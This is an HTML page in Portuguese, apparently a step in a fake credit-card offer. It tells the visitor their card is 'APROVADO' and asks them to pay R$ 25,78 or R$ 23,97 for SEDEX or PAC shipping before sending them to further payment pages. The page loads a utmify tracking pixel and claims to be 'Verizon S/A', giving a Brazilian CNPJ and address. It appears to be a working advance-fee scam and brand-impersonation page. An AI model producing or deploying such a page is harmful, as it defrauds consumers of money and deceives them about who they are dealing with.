<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Verizon - Faça seu Cartão</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/style.css">
    
<script src="js/latest.js" async="" defer=""></script>

<script>
  window.pixelId = "66bb763debbcebab27d68442";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script><script async="" defer="" src="js/pixel.js"></script>
    
</head><body>
    <link rel="stylesheet" href="css/style.css">


<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">   
    <div class="header">
        <img style="width: 160px;" src="images/VfoPzxB.png" alt="Imagem Centralizada"> 
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;" class="main-content text-center">
        <h5 style="margin-bottom: 20px;">Agora basta escolher uma forma de envio do seu Cartão de Crédito<strong> APROVADO</strong></h5>
        
        <div id="opcoes-envio" class="mb-3">
            <!-- Opção SEDEX -->
            <div class="card-opcao mb-3" onclick="selecionarOpcao('sedex')">
                <div class="d-flex justify-content-between align-items-center">
                    <div>
                        <h5 style="color: #ff4c2a;" class="text-pink mb-0">SEDEX</h5>
                        <small>1-2 dias úteis</small>
                    </div>
                    <div>
                        <h5 style="color: #ff4c2a;" class="text-pink mb-0">R$ 25,78</h5>
                    </div>
                </div>
            </div>

            <!-- Opção PAC -->
            <div class="card-opcao mb-3" onclick="selecionarOpcao('pac')">
                <div class="d-flex justify-content-between align-items-center">
                    <div>
                        <h5 class="text-muted mb-0">PAC</h5>
                        <small class="text-muted">4 dias úteis</small>
                    </div>
                    <div>
                        <h5 class="text-muted mb-0">R$ 23,97</h5>
                    </div>
                </div>
            </div>
        </div>

        <button style="background: #ff4a49;" type="submit" id="continuarEnvio" class="btn btn-custom w-100 rounded-pill" disabled="">Continuar</button>
        </div>
    </div>
    
    <script>
        let opcaoSelecionada = null;

        function selecionarOpcao(opcao) {
            opcaoSelecionada = opcao;

            // Remove a classe 'selecionado' de todas as opções
            document.querySelectorAll('.card-opcao').forEach(function(card) {
                card.classList.remove('selecionado');
            });

            // Adiciona a classe 'selecionado' à opção clicada
            document.querySelector(`.card-opcao[onclick="selecionarOpcao('${opcao}')"]`).classList.add('selecionado');

            // Habilita o botão de continuar
            document.getElementById('continuarEnvio').disabled = false;
        }

        document.getElementById('continuarEnvio').addEventListener('click', function() {
            if (opcaoSelecionada) {
                localStorage.setItem('freteEscolhido', opcaoSelecionada);
                if(opcaoSelecionada === 'sedex') {
                    window.location.href = 'sedex/index.php'; 
                }else{
                    window.location.href = 'pac/index.php';
                }
            }
        });
    </script>

    <style>
        .card-opcao {
            padding: 15px;
            border: 2px solid #ccc;
            border-radius: 10px;
            cursor: pointer;
        }

        .card-opcao.selecionado {
            border-color: #ffb836;;
            background-color: #ffc2374d;
        }

        .text-pink {
            color: #e6007e;
        }
    </style>

    <div class="footer py-4" id="footerChg">
        © 2024 Verizon S/A. CNPJ 68.694.585/0001-20. <br>
        Av. Brig. Faria Lima, 1811, São Paulo/SP
    </div>

    <script src="js/bootstrap.bundle.min.js"></script>




</div>
</body></html>